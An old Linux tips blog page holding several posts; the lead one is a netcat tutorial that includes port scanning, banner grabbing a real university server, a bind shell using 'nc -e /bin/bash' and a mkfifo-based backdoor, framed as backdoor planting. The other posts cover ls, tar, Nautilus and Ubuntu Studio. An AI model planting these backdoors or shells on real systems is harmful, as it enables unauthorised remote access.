Monday 22 October 2012
Ninja Fu With Netcat - Hacker's Swiss Army Knife
Netcat is one of my favorite tools for network investigations and backdoor planting. Netcat is a seemingly simple but very powerful and useful tool to read and write network connections using TCP or UDP. In this post, we will see several examples of using netcat in different scenarios.
First of all, if you are using distros like Ubuntu, they are probably including the OpenBSD netcat which does not provide a very useful switch that lets us execute any command. The netcat-traditional offers this switch so for learning purpose, you should install the netcat-traditional package by issuing the command below in Ubuntu & its derivatives (However, beware of inherent risk with this feature of the traditional netcat):
Now you can use both OpenBSD and traditional versions by using nc.openbsd and nc.traditional respectively. However, the nc command might still be symbolically linked with nc.openbsd (/etc/alternatives/nc). If you want to permanently use nc to refer nc.traditional, type the following command (or do sudo rm /bin/nc && sudo ln -s /bin/nc.traditional /bin/nc):
As I had already said, netcat is a very useful tool for network related works and hence often referred as Hacker's Swiss Army Knife and TCP/IP Swiss Army Knife. You can use netcat for several purposes such as file transfer, port scanning, listen server, bind & reverse shells, backdoors, etc. Because of this, netcat has been a favorite tool for hackers to get and maintain access to the servers.
Before beginning with the examples, I would like to inform you that most of the times ports above 1024 are used to create listen servers with netcat. This is because ports below 1024 are reserved by OS for core network services and you can not bind to these ports without special privilege to the system.
Once the client gets connected, the netcat listener might then look like this:
Noticed the port 38700 in the end? This is the port that the client uses to talk with the server. Observe that the value is much higher than 1024 and hence such ports are known as ephemeral port.
Once the client and server get connected, you can write anything and press ENTER. The data will get transmitted to the other end thus making netcat a data transfer tool.
As seen above, I opened the RAW connection to ku.edu.np and then issued HEAD / HTTP/1.0\n\n request to obtain the HTTP header. You can also notice (see web server version & PHP version?) that netcat can be used for basic fingerprinting and banner grabbing. Of course, this is not limited to HTTP fingerprinting. Extend the idea to work with other services.
This example taken from Wiki entry works as a one shot webserver hosting the my_file's content which can be accessed through web browser by specifying http://server:8080.
To transfer file from server to client, set up the server as below:
In the client end, do:
If you wish to scan number of hosts (or full network), you can do something like below:
In the first example, ports 1-1024 are scanned in the host 192.168.1.1 and in the second example, a class C network 192.168.1.0/24 is scanned. However, netcat is by no means an advanced port scanner and tools such as nmap are great for this job.
The -e switch can be specified to spawn a process in the system. In the server, type the command below:
At the other end, you will just connect to the just started netcat service and then issue any command that the bash recognizes. Good for shells in the servers, isn't it?
Since the normal pipe (|) is not so reliable & works in a unidirectional fashion, linux offers something called named pipes which can be exploited to create advanced backdoor in the systems which might not consist the netcat with -e support.
At the other end, you just need to connect to the newly created netcat service port:
I hope this post provides some directions on how to work with netcat and proves that netcat is called TCP/IP swiss army knife for the reason. There are other several possibilities with netcat. Explore to get more out of this awesome tool. ;)
Read more...
First of all, if you are using distros like Ubuntu, they are probably including the OpenBSD netcat which does not provide a very useful switch that lets us execute any command. The netcat-traditional offers this switch so for learning purpose, you should install the netcat-traditional package by issuing the command below in Ubuntu & its derivatives (However, beware of inherent risk with this feature of the traditional netcat):
samar@samar-Techgaun:~$ sudo apt-get install netcat-traditional
Now you can use both OpenBSD and traditional versions by using nc.openbsd and nc.traditional respectively. However, the nc command might still be symbolically linked with nc.openbsd (/etc/alternatives/nc). If you want to permanently use nc to refer nc.traditional, type the following command (or do sudo rm /bin/nc && sudo ln -s /bin/nc.traditional /bin/nc):
samar@samar-Techgaun:~$ sudo update-alternatives --config nc
As I had already said, netcat is a very useful tool for network related works and hence often referred as Hacker's Swiss Army Knife and TCP/IP Swiss Army Knife. You can use netcat for several purposes such as file transfer, port scanning, listen server, bind & reverse shells, backdoors, etc. Because of this, netcat has been a favorite tool for hackers to get and maintain access to the servers.
Before beginning with the examples, I would like to inform you that most of the times ports above 1024 are used to create listen servers with netcat. This is because ports below 1024 are reserved by OS for core network services and you can not bind to these ports without special privilege to the system.
Simple Netcat Listen Server
samar@samar-Techgaun:~$ nc -lvp 1234
listening on [any] 1234 ...
listening on [any] 1234 ...
Simple Netcat Client
samar@samar-Techgaun:~$ nc -vvn 192.168.1.6 1234
(UNKNOWN) [192.168.1.6] 1234 (?) open
(UNKNOWN) [192.168.1.6] 1234 (?) open
Once the client gets connected, the netcat listener might then look like this:
samar@samar-Techgaun:~$ nc -lvp 1234
listening on [any] 1234 ...
connect to [192.168.1.6] from samar-Techgaun.local [192.168.1.6] 38700
listening on [any] 1234 ...
connect to [192.168.1.6] from samar-Techgaun.local [192.168.1.6] 38700
Noticed the port 38700 in the end? This is the port that the client uses to talk with the server. Observe that the value is much higher than 1024 and hence such ports are known as ephemeral port.
Once the client and server get connected, you can write anything and press ENTER. The data will get transmitted to the other end thus making netcat a data transfer tool.
Open Raw Connection With Netcat as client
samar@samar-Techgaun:~$ nc -vv ku.edu.np 80
Warning: inverse host lookup failed for 116.90.239.5: Unknown host
ku.edu.np [116.90.239.5] 80 (http) open
HEAD / HTTP/1.0\n\n
HTTP/1.1 200 OK
Date: Mon, 22 Oct 2012 04:46:49 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
sent 21, rcvd 171
Warning: inverse host lookup failed for 116.90.239.5: Unknown host
ku.edu.np [116.90.239.5] 80 (http) open
HEAD / HTTP/1.0\n\n
HTTP/1.1 200 OK
Date: Mon, 22 Oct 2012 04:46:49 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
sent 21, rcvd 171
As seen above, I opened the RAW connection to ku.edu.np and then issued HEAD / HTTP/1.0\n\n request to obtain the HTTP header. You can also notice (see web server version & PHP version?) that netcat can be used for basic fingerprinting and banner grabbing. Of course, this is not limited to HTTP fingerprinting. Extend the idea to work with other services.
Web Server Example Using Netcat
samar@samar-Techgaun:~/Desktop/test$ { echo -ne "HTTP/1.0 200 OK\r\nContent-Length: $(wc -c < my_file)\r\n\r\n"; cat my_file; } | nc -lv -p 8080
listening on [any] 8080 ...
listening on [any] 8080 ...
This example taken from Wiki entry works as a one shot webserver hosting the my_file's content which can be accessed through web browser by specifying http://server:8080.
File Transfer Using Netcat
To transfer file from server to client, set up the server as below:
samar@samar-Techgaun:~$ cat my_file
I am DATA
samar@samar-Techgaun:~$ nc -lvp 1234 < my_file
listening on [any] 1234 ...
I am DATA
samar@samar-Techgaun:~$ nc -lvp 1234 < my_file
listening on [any] 1234 ...
In the client end, do:
samar@samar-Techgaun:~$ nc -vv 192.168.1.6 1234 > output.txt
samar-Techgaun.local [192.168.1.6] 1234 (?) open
^C sent 0, rcvd 10
samar@samar-Techgaun:~$ cat output.txt
I am DATA
samar-Techgaun.local [192.168.1.6] 1234 (?) open
^C sent 0, rcvd 10
samar@samar-Techgaun:~$ cat output.txt
I am DATA
Port Scanning With Netcat
samar@samar-Techgaun:~$ nc -nvz -w1 192.168.1.1 1-1024
(UNKNOWN) [192.168.1.1] 80 (http) open
(UNKNOWN) [192.168.1.1] 23 (telnet) open
(UNKNOWN) [192.168.1.1] 21 (ftp) open
(UNKNOWN) [192.168.1.1] 80 (http) open
(UNKNOWN) [192.168.1.1] 23 (telnet) open
(UNKNOWN) [192.168.1.1] 21 (ftp) open
If you wish to scan number of hosts (or full network), you can do something like below:
samar@samar-Techgaun:~/Desktop/test$ for ip in $(seq 1 254); do nc -nvz -w1 192.168.1.$ip 1-1024; done
In the first example, ports 1-1024 are scanned in the host 192.168.1.1 and in the second example, a class C network 192.168.1.0/24 is scanned. However, netcat is by no means an advanced port scanner and tools such as nmap are great for this job.
Spawn a process
The -e switch can be specified to spawn a process in the system. In the server, type the command below:
samar@samar-Techgaun:~$ nc -lv -p 1234 -e /bin/bash
listening on [any] 1234 ...
listening on [any] 1234 ...
At the other end, you will just connect to the just started netcat service and then issue any command that the bash recognizes. Good for shells in the servers, isn't it?
samar@samar-Techgaun:~$ nc -vv 192.168.1.6 1234
samar-Techgaun.local [192.168.1.6] 1234 (?) open
ls
my_file
output.txt
samar-Techgaun.local [192.168.1.6] 1234 (?) open
ls
my_file
output.txt
Netcat backdoor using mkfifo
Since the normal pipe (|) is not so reliable & works in a unidirectional fashion, linux offers something called named pipes which can be exploited to create advanced backdoor in the systems which might not consist the netcat with -e support.
samar@samar-Techgaun:~$ mkfifo /tmp/b4ck; sh /tmp/b4ck | nc -lvp 1234 > /tmp/b4ck
listening on [any] 1234 ...
listening on [any] 1234 ...
At the other end, you just need to connect to the newly created netcat service port:
samar@samar-Techgaun:~$ nc -vv 192.168.1.6 1234
localhost [192.168.1.6] 1234 (?) open
ls
my_file
output.txt
sent 3, rcvd 33
localhost [192.168.1.6] 1234 (?) open
ls
my_file
output.txt
sent 3, rcvd 33
I hope this post provides some directions on how to work with netcat and proves that netcat is called TCP/IP swiss army knife for the reason. There are other several possibilities with netcat. Explore to get more out of this awesome tool. ;)
Read more...
Bookmark this post: | 
|
Sunday 21 October 2012
Ubuntu Studio - Ubuntu Derivation For Audio Video & Graphics Editor
Ubuntu Studio is a variant of Ubuntu aimed at the GNU/Linux audio, video and graphic enthusiast as well as professional. The distribution provides a collection of open-source applications available for multimedia creation.
Ubuntu Studio is a free, open source and powerful operating system created for the creative people to create exceptional arts using right sets of tools for audio, video and graphical editing. As an officially recognized derivative of Ubuntu, Ubuntu Studio is supported by Canonical Ltd.
Ubuntu Studio is released every six months, but a long term release (LTS) version is released only every 2 years.
Audio apps include Jack, Ardour, Audacity, QTractor, Hydrogen, Yoshimi, Rakarrack, Gladish, Puredata and several other apps available for download.
Graphical apps include Blender, Inkscape, GIMP, MyPaint and several other apps.
Video apps include Openshot video editor, FFMPEG, DVDStyler, and other apps.
Photography apps include Darktable, Shotwell, and several other useful apps.
Calibre, Scribus and LibreOffice and other apps are available to suffice publishing needs.
Useful Links
Ubuntu Studio HOME
Ubuntu Studio Download
Ubuntu Studio Documentation
Read more...
Ubuntu Studio is released every six months, but a long term release (LTS) version is released only every 2 years.
Audio apps include Jack, Ardour, Audacity, QTractor, Hydrogen, Yoshimi, Rakarrack, Gladish, Puredata and several other apps available for download.
Graphical apps include Blender, Inkscape, GIMP, MyPaint and several other apps.
Video apps include Openshot video editor, FFMPEG, DVDStyler, and other apps.
Photography apps include Darktable, Shotwell, and several other useful apps.
Calibre, Scribus and LibreOffice and other apps are available to suffice publishing needs.
Useful Links
Ubuntu Studio HOME
Ubuntu Studio Download
Ubuntu Studio Documentation
Read more...
Bookmark this post: |
|
Enable Auto Correction Of Path In Bash
While using the cd command, its normal to make mistakes while typing the directory path. You can enable auto-correction while typing directory path by enabling a particular shell option.
Minor spelling mistakes will be corrected automatically if the particular shell option cdspell using the SHell OPTions command invoked with shopt command.
When you enable the cdspell shell option, the errors checked for are missing characters, repeated characters, and transposed characters. Once the error is encountered, the corrected path is printed and directory is changed successfully.
The line shopt -s cdspell enables the auto-correction while using cd command. The session above shows some of the corrections performed once we enabled the cdspell shell option.
If you want to turn on this particular setting, then add the appropriate line using the command below:
I hope this counts as useful tips to beginner linux guys ;)
Read more...
Minor spelling mistakes will be corrected automatically if the particular shell option cdspell using the SHell OPTions command invoked with shopt command.
When you enable the cdspell shell option, the errors checked for are missing characters, repeated characters, and transposed characters. Once the error is encountered, the corrected path is printed and directory is changed successfully.
samar@samar-Techgaun:~$ shopt -s cdspell
samar@samar-Techgaun:~$ cd Desktp
Desktop
samar@samar-Techgaun:~/Desktop$ cd ../Deskotp/
../Desktop/
samar@samar-Techgaun:~/Desktop$ cd ../Desktoop
../Desktop
samar@samar-Techgaun:~/Desktop$
samar@samar-Techgaun:~$ cd Desktp
Desktop
samar@samar-Techgaun:~/Desktop$ cd ../Deskotp/
../Desktop/
samar@samar-Techgaun:~/Desktop$ cd ../Desktoop
../Desktop
samar@samar-Techgaun:~/Desktop$
The line shopt -s cdspell enables the auto-correction while using cd command. The session above shows some of the corrections performed once we enabled the cdspell shell option.
If you want to turn on this particular setting, then add the appropriate line using the command below:
samar@samar-Techgaun:~$ echo "shopt -s cdspell" >> ~/.bash_profile
I hope this counts as useful tips to beginner linux guys ;)
Read more...
Bookmark this post: |
|
Saturday 20 October 2012
Ubuntu Tweak Will No Longer Be Developed
Comes as a very sad news but Ubuntu Tweak developer has decided to stop the development of Ubuntu Tweak.
Tualatrix Chou writes in a blog post:
" I want to stop the development and maintenance of Ubuntu Tweak. This means you will not be able to use “Apps” (Since it is a web service), I will not response for the bug report, the last commit of the code will be: Add cache support for Apps, only available in Ubuntu 12.10, so sad".
While the developer writes the reason as If making free software is not free any more, why still doing this?, I found the whole post quite cryptic.
One of his friend mentions that Ubuntu Tweak, though being a great app has not been included in the official source which is a really depressing thing.
Read more...
" I want to stop the development and maintenance of Ubuntu Tweak. This means you will not be able to use “Apps” (Since it is a web service), I will not response for the bug report, the last commit of the code will be: Add cache support for Apps, only available in Ubuntu 12.10, so sad".
While the developer writes the reason as If making free software is not free any more, why still doing this?, I found the whole post quite cryptic.
One of his friend mentions that Ubuntu Tweak, though being a great app has not been included in the official source which is a really depressing thing.
Read more...
Bookmark this post: |
|
Tuesday 16 October 2012
Practical ls Command Examples For Fun & Profit
The power of linux lies in the shell through which we can perform complex job in no time. While the directory listing command 'ls' seems to be very simple command, the linux shell provides the power to use switches and pipes to do anything from terminal. Check out this list with practically useful examples using ls.
Any more example that fires up in your mind? Feel free to share over here ;)
Read more...
Display all files including hidden files/folders
ls -a
Display one file/folder per line
ls -1
Count number of files & folders
ls -1 | wc -l
Human readable file sizes (eg. Mb or Gb)
ls -lh
Alphabetically sort the listing
ls -X
Only list the folders in current directory
ls -d */
ls -p | grep /
ls -p | grep /
Display folders in current directory consisting certain patterns
ls -l D* | grep :$
ls -l *a* | grep :$
ls -l *a* | grep :$
List files by descending order of modification time
ls -lt
ls -l --sort=time #alternative long version
ls -l --sort=time #alternative long version
List files by descending order of creation time
ls -lct
List files in reverse order
ls -ltr
ls -l --sort=time --reverse #alternative long version
ls -l --sort=time --reverse #alternative long version
List files in descending order of file size
ls -lSh
ls -lh --sort=size
ls -lSh1 *.avi #find largest AVI file
rm `ls -S1 | head -1` #delete largest file in current folder
ls -lh --sort=size
ls -lSh1 *.avi #find largest AVI file
rm `ls -S1 | head -1` #delete largest file in current folder
List files in ascending order of file size
ls -lShr
ls -lh --sort=size --reverse #alternative long version
ls -lh --sort=size --reverse #alternative long version
Display directories in recursive manner
ls -R
Display the files/folders created today
ls -l --time-style=+%F | grep `date +%F`
Display the files/folders created this year
ls -l --time-style=+%y | grep `date +%y`
Any more example that fires up in your mind? Feel free to share over here ;)
Read more...
Bookmark this post: |
|
Monday 15 October 2012
Useful Nautilus Shortcuts
Nautilus is a default file manager for GNOME Desktop and is used as the default file manager in several linux distros such as Ubuntu. I love nautilus because its simple, friendly, and clean, supports local as well as remote file systems over different protocols. Moreover, there are several useful shortcuts that make life easier while using nautilus.
Below is the list of the most helpful shortcuts for navigation and file management in the nautilus:
Ctrl + r: Refresh the current view
Ctrl + h: Toggle show/hide mode for hidden files
F9: Show/Hide the side pane
Ctrl + l: Activate location/url bar (You can then provide path to local or remote filesystems or quickly copy the absolute paths)
Alt + Up Arrow: Move up one directory level
Alt + Down Arrow: Move down one directory level (the directory to be entered should be selected for this to work)
Alt + Left Arrow: Go back to the previous folder in view
Alt + Right Arrow: Go forward
Ctrl + Shift + n: Create a new empty directory
Ctrl + (+ / -): Zoom in (+) or zoom out (-)
Ctrl + 0: Zoom to normal state
Alt + Enter: View selected file/folder properties
F2: Rename selected file/folder
Ctrl + Shift + Drag file/folder: Create symbolic link to file/folder
Ctrl + f: Search for files/folders
Ctrl + s: Select files based upon templates (eg. select all pdf files using *.pdf)
Ctrl + 1: Toggle view as icons
Ctrl + 2: Toggle view as lists
Ctrl + 3: Toggle compact view
Ctrl + w: Close current nautilus window
Ctrl + Shift + w: Current all open nautilus windows
Ctrl + T: Open new tab
Alt + HOME: Navigate to HOME folder
F6: Toggle between side pane and central pane
Know more shortcuts? Share as the comments :)
Read more...
Below is the list of the most helpful shortcuts for navigation and file management in the nautilus:
Ctrl + r: Refresh the current view
Ctrl + h: Toggle show/hide mode for hidden files
F9: Show/Hide the side pane
Ctrl + l: Activate location/url bar (You can then provide path to local or remote filesystems or quickly copy the absolute paths)
Alt + Up Arrow: Move up one directory level
Alt + Down Arrow: Move down one directory level (the directory to be entered should be selected for this to work)
Alt + Left Arrow: Go back to the previous folder in view
Alt + Right Arrow: Go forward
Ctrl + Shift + n: Create a new empty directory
Ctrl + (+ / -): Zoom in (+) or zoom out (-)
Ctrl + 0: Zoom to normal state
Alt + Enter: View selected file/folder properties
F2: Rename selected file/folder
Ctrl + Shift + Drag file/folder: Create symbolic link to file/folder
Ctrl + f: Search for files/folders
Ctrl + s: Select files based upon templates (eg. select all pdf files using *.pdf)
Ctrl + 1: Toggle view as icons
Ctrl + 2: Toggle view as lists
Ctrl + 3: Toggle compact view
Ctrl + w: Close current nautilus window
Ctrl + Shift + w: Current all open nautilus windows
Ctrl + T: Open new tab
Alt + HOME: Navigate to HOME folder
F6: Toggle between side pane and central pane
Know more shortcuts? Share as the comments :)
Read more...
Bookmark this post: |
|
Saturday 13 October 2012
How To Exclude Directory While Compressing With Tar
Quite a handy and useful tip here. Several times, you want to compress files and folders but there might be cases when you want to compress your data excluding some of the directories. Tar command makes the process easier by providing us a exclusion switch.
I was actually backing up data I had downloaded in the remote server and wanted a copy of backup tar file in my system as well. But all those images that resided in the folders deep inside were not necessary for me. So all I did was something like below:
The above command effectively excludes all the sub directories from testdirectory having the string image (eg. image, images, images_old in my case) and creates the backup.tar file. Moreover, the --exclude switch also co-operates the regular expressions so you can specify the regex to filter the directories. As an example, the command below excludes the directories a, b, c, d, and e while creating the tarball.
You can exploit this switch for ease several times in your daily works. I hope this helps :)
Read more...
I was actually backing up data I had downloaded in the remote server and wanted a copy of backup tar file in my system as well. But all those images that resided in the folders deep inside were not necessary for me. So all I did was something like below:
adm@RServ:~$ tar cvf backup.tar test --exclude=image*
The above command effectively excludes all the sub directories from testdirectory having the string image (eg. image, images, images_old in my case) and creates the backup.tar file. Moreover, the --exclude switch also co-operates the regular expressions so you can specify the regex to filter the directories. As an example, the command below excludes the directories a, b, c, d, and e while creating the tarball.
adm@RServ:~$ tar cvf backup.tar test --exclude=[a-e]
You can exploit this switch for ease several times in your daily works. I hope this helps :)
Read more...
Bookmark this post: |
|
Empty Trash From Command Line In Ubuntu
CLI is such a sexy piece so why bother using GUI, even for cleaning up your trash. In this post, you will see how you can empty trash in Ubuntu from command line.
The trash you see in GUI is nothing but just the view for the files deleted by users which are temporarily moved to the special location of user's home directory. For any user, the trash location is ~/.local/share/Trash/. That is, whatever a user deletes gets saved in this location.
I hope this becomes useful :)
Read more...
The trash you see in GUI is nothing but just the view for the files deleted by users which are temporarily moved to the special location of user's home directory. For any user, the trash location is ~/.local/share/Trash/. That is, whatever a user deletes gets saved in this location.
samar@samar-Techgaun:~$ rm -rf ~/.local/share/Trash/
I hope this becomes useful :)
Read more...
Bookmark this post: |
|
Subscribe to:
Posts (Atom)